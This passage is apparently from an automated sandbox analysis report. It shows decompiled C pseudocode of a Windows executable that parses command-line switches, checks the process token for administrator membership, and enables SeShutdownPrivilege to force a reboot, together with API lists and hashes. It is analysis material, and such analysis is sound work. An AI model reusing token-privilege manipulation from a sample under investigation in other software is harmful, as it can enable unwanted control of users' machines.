                                                                                                                                                                                                                                            																			goto L49;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		_t201 = _v265;
                                                                                                                                                                                                                                            																		 *0x8d9a2c = 1;
                                                                                                                                                                                                                                            																		if(_t201 != 0) {
                                                                                                                                                                                                                                            																			_t220 =  &_v265;
                                                                                                                                                                                                                                            																			do {
                                                                                                                                                                                                                                            																				_t220 = _t220 + 1;
                                                                                                                                                                                                                                            																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                                                            																				if(_t142 == 0) {
                                                                                                                                                                                                                                            																					_t143 = 2;
                                                                                                                                                                                                                                            																					 *0x8d9a2c =  *0x8d9a2c | _t143;
                                                                                                                                                                                                                                            																					goto L70;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t145 = _t142 - 3;
                                                                                                                                                                                                                                            																					if(_t145 == 0) {
                                                                                                                                                                                                                                            																						 *0x8d8d48 =  *0x8d8d48 | 0x00000040;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t146 = _t145 - 5;
                                                                                                                                                                                                                                            																						if(_t146 == 0) {
                                                                                                                                                                                                                                            																							 *0x8d9a2c =  *0x8d9a2c & 0xfffffffd;
                                                                                                                                                                                                                                            																							goto L70;
                                                                                                                                                                                                                                            																						} else {
                                                                                                                                                                                                                                            																							_t147 = _t146 - 5;
                                                                                                                                                                                                                                            																							if(_t147 == 0) {
                                                                                                                                                                                                                                            																								 *0x8d9a2c =  *0x8d9a2c & 0xfffffffe;
                                                                                                                                                                                                                                            																								goto L70;
                                                                                                                                                                                                                                            																							} else {
                                                                                                                                                                                                                                            																								_t149 = _t147;
                                                                                                                                                                                                                                            																								if(_t149 == 0) {
                                                                                                                                                                                                                                            																									 *0x8d8d48 =  *0x8d8d48 | 0x00000080;
                                                                                                                                                                                                                                            																								} else {
                                                                                                                                                                                                                                            																									if(_t149 == 3) {
                                                                                                                                                                                                                                            																										 *0x8d9a2c =  *0x8d9a2c | 0x00000004;
                                                                                                                                                                                                                                            																										L70:
                                                                                                                                                                                                                                            																										 *0x8d8a28 = 1;
                                                                                                                                                                                                                                            																									} else {
                                                                                                                                                                                                                                            																										_t209 = 0;
                                                                                                                                                                                                                                            																									}
                                                                                                                                                                                                                                            																								}
                                                                                                                                                                                                                                            																							}
                                                                                                                                                                                                                                            																						}
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t144 =  *_t220;
                                                                                                                                                                                                                                            																				_t201 = _t144;
                                                                                                                                                                                                                                            																			} while (_t144 != 0);
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	 *0x8d9a2c = 3;
                                                                                                                                                                                                                                            																	 *0x8d8a28 = 1;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            																goto L50;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																if(_t132 == 0) {
                                                                                                                                                                                                                                            																	goto L98;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	L49:
                                                                                                                                                                                                                                            																	_t209 = 0;
                                                                                                                                                                                                                                            																	L50:
                                                                                                                                                                                                                                            																	_t173 = _v272;
                                                                                                                                                                                                                                            																	if( *_t173 != 0) {
                                                                                                                                                                                                                                            																		goto L2;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		break;
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L106;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										L34:
                                                                                                                                                                                                                                            										_t209 = 0;
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L131;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *0x8d8a2c != 0 &&  *0x8d8b3e == 0) {
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0x8d9a3c, 0x8d8b3e, 0x104) == 0) {
                                                                                                                                                                                                                                            							_t209 = 0;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t202 = 0x5c;
                                                                                                                                                                                                                                            							 *((char*)(E008D66C8(0x8d8b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t63 = _t209;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L131:
                                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                                            0x008d5e22
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5dcc
                                                                                                                                                                                                                                            0x008d5dce
                                                                                                                                                                                                                                            0x008d5e24
                                                                                                                                                                                                                                            0x008d5e24
                                                                                                                                                                                                                                            0x008d5e2c
                                                                                                                                                                                                                                            0x008d5e47
                                                                                                                                                                                                                                            0x008d5e4a
                                                                                                                                                                                                                                            0x008d61d2
                                                                                                                                                                                                                                            0x008d61e2
                                                                                                                                                                                                                                            0x008d61e7
                                                                                                                                                                                                                                            0x008d61ee
                                                                                                                                                                                                                                            0x008d61f1
                                                                                                                                                                                                                                            0x008d61f1
                                                                                                                                                                                                                                            0x008d61f8
                                                                                                                                                                                                                                            0x008d61f8
                                                                                                                                                                                                                                            0x008d5e50
                                                                                                                                                                                                                                            0x008d5e53
                                                                                                                                                                                                                                            0x008d6109
                                                                                                                                                                                                                                            0x008d611f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d6125
                                                                                                                                                                                                                                            0x008d6137
                                                                                                                                                                                                                                            0x008d613a
                                                                                                                                                                                                                                            0x008d613c
                                                                                                                                                                                                                                            0x008d613e
                                                                                                                                                                                                                                            0x008d613e
                                                                                                                                                                                                                                            0x008d6141
                                                                                                                                                                                                                                            0x008d6141
                                                                                                                                                                                                                                            0x008d6143
                                                                                                                                                                                                                                            0x008d6144
                                                                                                                                                                                                                                            0x008d614a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d6150
                                                                                                                                                                                                                                            0x008d6152
                                                                                                                                                                                                                                            0x008d615c
                                                                                                                                                                                                                                            0x008d6170
                                                                                                                                                                                                                                            0x008d6172
                                                                                                                                                                                                                                            0x008d617c
                                                                                                                                                                                                                                            0x008d6190
                                                                                                                                                                                                                                            0x008d6190
                                                                                                                                                                                                                                            0x008d6196
                                                                                                                                                                                                                                            0x008d61a5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d61ab
                                                                                                                                                                                                                                            0x008d61b9
                                                                                                                                                                                                                                            0x008d61c6
                                                                                                                                                                                                                                            0x008d61c6
                                                                                                                                                                                                                                            0x008d617e
                                                                                                                                                                                                                                            0x008d6180
                                                                                                                                                                                                                                            0x008d618a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d618a
                                                                                                                                                                                                                                            0x008d615e
                                                                                                                                                                                                                                            0x008d6160
                                                                                                                                                                                                                                            0x008d616a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d616a
                                                                                                                                                                                                                                            0x008d615c
                                                                                                                                                                                                                                            0x008d614a
                                                                                                                                                                                                                                            0x008d610b
                                                                                                                                                                                                                                            0x008d610e
                                                                                                                                                                                                                                            0x008d610e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5e59
                                                                                                                                                                                                                                            0x008d5e59
                                                                                                                                                                                                                                            0x008d5e5c
                                                                                                                                                                                                                                            0x008d604f
                                                                                                                                                                                                                                            0x008d6056
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d605c
                                                                                                                                                                                                                                            0x008d606e
                                                                                                                                                                                                                                            0x008d6071
                                                                                                                                                                                                                                            0x008d6073
                                                                                                                                                                                                                                            0x008d6075
                                                                                                                                                                                                                                            0x008d6075
                                                                                                                                                                                                                                            0x008d6078
                                                                                                                                                                                                                                            0x008d6078
                                                                                                                                                                                                                                            0x008d607a
                                                                                                                                                                                                                                            0x008d607b
                                                                                                                                                                                                                                            0x008d6081
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d6087
                                                                                                                                                                                                                                            0x008d6087
                                                                                                                                                                                                                                            0x008d608d
                                                                                                                                                                                                                                            0x008d609c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d60a2
                                                                                                                                                                                                                                            0x008d60aa
                                                                                                                                                                                                                                            0x008d60b2
                                                                                                                                                                                                                                            0x008d60b7
                                                                                                                                                                                                                                            0x008d60bd
                                                                                                                                                                                                                                            0x008d60bf
                                                                                                                                                                                                                                            0x008d60bf
                                                                                                                                                                                                                                            0x008d60d6
                                                                                                                                                                                                                                            0x008d60e0
                                                                                                                                                                                                                                            0x008d60e7
                                                                                                                                                                                                                                            0x008d60f5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5e65
                                                                                                                                                                                                                                            0x008d5e5c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5dd0
                                                                                                                                                                                                                                            0x008d5dd0
                                                                                                                                                                                                                                            0x008d5dd0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5dd0
                                                                                                                                                                                                                                            0x008d5dce
                                                                                                                                                                                                                                            0x008d5dca
                                                                                                                                                                                                                                            0x008d5dba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5d00
                                                                                                                                                                                                                                            0x008d5dd9
                                                                                                                                                                                                                                            0x008d5e04
                                                                                                                                                                                                                                            0x008d61fe
                                                                                                                                                                                                                                            0x008d5e0a
                                                                                                                                                                                                                                            0x008d5e0c
                                                                                                                                                                                                                                            0x008d5e17
                                                                                                                                                                                                                                            0x008d5e17
                                                                                                                                                                                                                                            0x008d5e04
                                                                                                                                                                                                                                            0x008d6200
                                                                                                                                                                                                                                            0x008d6200
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharNextA.USER32(?,00000000,?,?), ref: 008D5CEE
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(008D8B3E,00000104,00000000,?,?), ref: 008D5DFC
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 008D5E3E
                                                                                                                                                                                                                                            • CharUpperA.USER32(-00000052), ref: 008D5EE1
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 008D5F6F
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 008D5FA7
                                                                                                                                                                                                                                            • CharUpperA.USER32(-0000004E), ref: 008D6008
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 008D60AA
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,008D1140,00000000,00000040,00000000), ref: 008D61F1
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 008D61F8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                            • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                            • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                            • Opcode ID: 7c6beaaa7f773ccfb1cd1dc3dcc29c4aa6d08e714b4442feaaa297caa0e114ea
                                                                                                                                                                                                                                            • Instruction ID: b2462a64787690b3ee01047a116c2302f5fdeda26c7d93d8bc600d3bc6e4a1a5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c6beaaa7f773ccfb1cd1dc3dcc29c4aa6d08e714b4442feaaa297caa0e114ea
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58D17971A04A5D9EDF359B3C8C487BA3B62FB56354F1403ABC4C6D6391EA708E828B51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                                            			E008D18A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t51 = __esi;
                                                                                                                                                                                                                                            				_t49 = __edx;
                                                                                                                                                                                                                                            				_t23 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                            				_t25 =  *0x8d8128; // 0x2
                                                                                                                                                                                                                                            				_t45 = 0;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t50 = 2;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if(_t25 != _t50) {
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					return E008D6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(E008D17EE( &_v20) != 0) {
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					if(_v20 != 0) {
                                                                                                                                                                                                                                            						 *0x8d8128 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                            					CloseHandle(_v28);
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_push(__esi);
                                                                                                                                                                                                                                            					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                            					if(_t52 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_pop(_t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                            						L15:
                                                                                                                                                                                                                                            						LocalFree(_t52);
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if( *_t52 <= 0) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							FreeSid(_v32);
                                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                            						_t50 = _t15;
                                                                                                                                                                                                                                            						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                            							_t45 = _t45 + 1;
                                                                                                                                                                                                                                            							_t50 = _t50 + 8;
                                                                                                                                                                                                                                            							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x8d8128 = 1;
                                                                                                                                                                                                                                            						_v20 = 1;
                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 008D17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,008D18DD), ref: 008D181A
                                                                                                                                                                                                                                              • Part of subcall function 008D17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 008D182C
                                                                                                                                                                                                                                              • Part of subcall function 008D17EE: AllocateAndInitializeSid.ADVAPI32(008D18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,008D18DD), ref: 008D1855
                                                                                                                                                                                                                                              • Part of subcall function 008D17EE: FreeSid.ADVAPI32(?,?,?,?,008D18DD), ref: 008D1883
                                                                                                                                                                                                                                              • Part of subcall function 008D17EE: FreeLibrary.KERNEL32(00000000,?,?,?,008D18DD), ref: 008D188A
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 008D18EB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 008D18F2
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 008D190A
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008D1918
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,?,?), ref: 008D192C
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 008D1944
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 008D1964
                                                                                                                                                                                                                                            • EqualSid.ADVAPI32(00000004,?), ref: 008D197A
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?), ref: 008D199C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 008D19A3
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008D19AD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2168512254-0
                                                                                                                                                                                                                                            • Opcode ID: acd4905345bbd2202b36ba950be2cf2d5b6f42bf02a8fed7dd825bbc619db19a
                                                                                                                                                                                                                                            • Instruction ID: ffe765b9162013254eafc16b7066af14264dfed164a5436d2da70630588189d8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: acd4905345bbd2202b36ba950be2cf2d5b6f42bf02a8fed7dd825bbc619db19a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8311971A01209FBDF209FA6DCA8AAFBBB8FF04710F60462AE545D2250DB319D05CB61
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                                            			E008D1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                                            				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				int _t28;
                                                                                                                                                                                                                                            				signed char _t30;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t41 = __esi;
                                                                                                                                                                                                                                            				_t38 = __edi;
                                                                                                                                                                                                                                            				_t30 = __ecx;
                                                                                                                                                                                                                                            				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						if( *0x8d9a40 != 0) {
                                                                                                                                                                                                                                            							_pop(_t30);
                                                                                                                                                                                                                                            							_t44 = _t46;
                                                                                                                                                                                                                                            							_t13 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                            							_push(_t38);
                                                                                                                                                                                                                                            							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                            								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                            								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                            								_v12 = 2;
                                                                                                                                                                                                                                            								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                            								CloseHandle(_v28);
                                                                                                                                                                                                                                            								_t41 = _t41;
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                            										_t25 = 1;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t37 = 0x4f7;
                                                                                                                                                                                                                                            										goto L3;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t37 = 0x4f6;
                                                                                                                                                                                                                                            									goto L4;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t37 = 0x4f5;
                                                                                                                                                                                                                                            								L3:
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								L4:
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								E008D44B9(0, _t37);
                                                                                                                                                                                                                                            								_t25 = 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_pop(_t40);
                                                                                                                                                                                                                                            							return E008D6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t37 = 0x522;
                                                                                                                                                                                                                                            						_t28 = E008D44B9(0, 0x522, 0x8d1140, 0, 0x40, 4);
                                                                                                                                                                                                                                            						if(_t28 != 6) {
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					__eax = E008D1EA7(__ecx);
                                                                                                                                                                                                                                            					if(__eax != 2) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						return _t28;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            0x008d1fa9
                                                                                                                                                                                                                                            0x008d1fb4
                                                                                                                                                                                                                                            0x008d1fbb
                                                                                                                                                                                                                                            0x008d1fc3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1fc3
                                                                                                                                                                                                                                            0x008d1f9a
                                                                                                                                                                                                                                            0x008d1f9a
                                                                                                                                                                                                                                            0x008d1fa2
                                                                                                                                                                                                                                            0x008d1fd9
                                                                                                                                                                                                                                            0x008d1fda
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1fa2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 008D1EFB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 008D1F02
                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 008D1FD3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                            • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                            • Opcode ID: fdc82a6871a57fc7ead5e5b2c460af2c4f351a845105087d5e91abd218755feb
                                                                                                                                                                                                                                            • Instruction ID: 6de922ef97c9da33a1ffcd3981826d91b52f7c3972b823fca872a6a73075adb9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fdc82a6871a57fc7ead5e5b2c460af2c4f351a845105087d5e91abd218755feb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80219471A41205BBDF205BA5DC4EFBB77B8FF85B10F20021BFA06E6281DB7488419666
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D7155() {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct _FILETIME _v16;
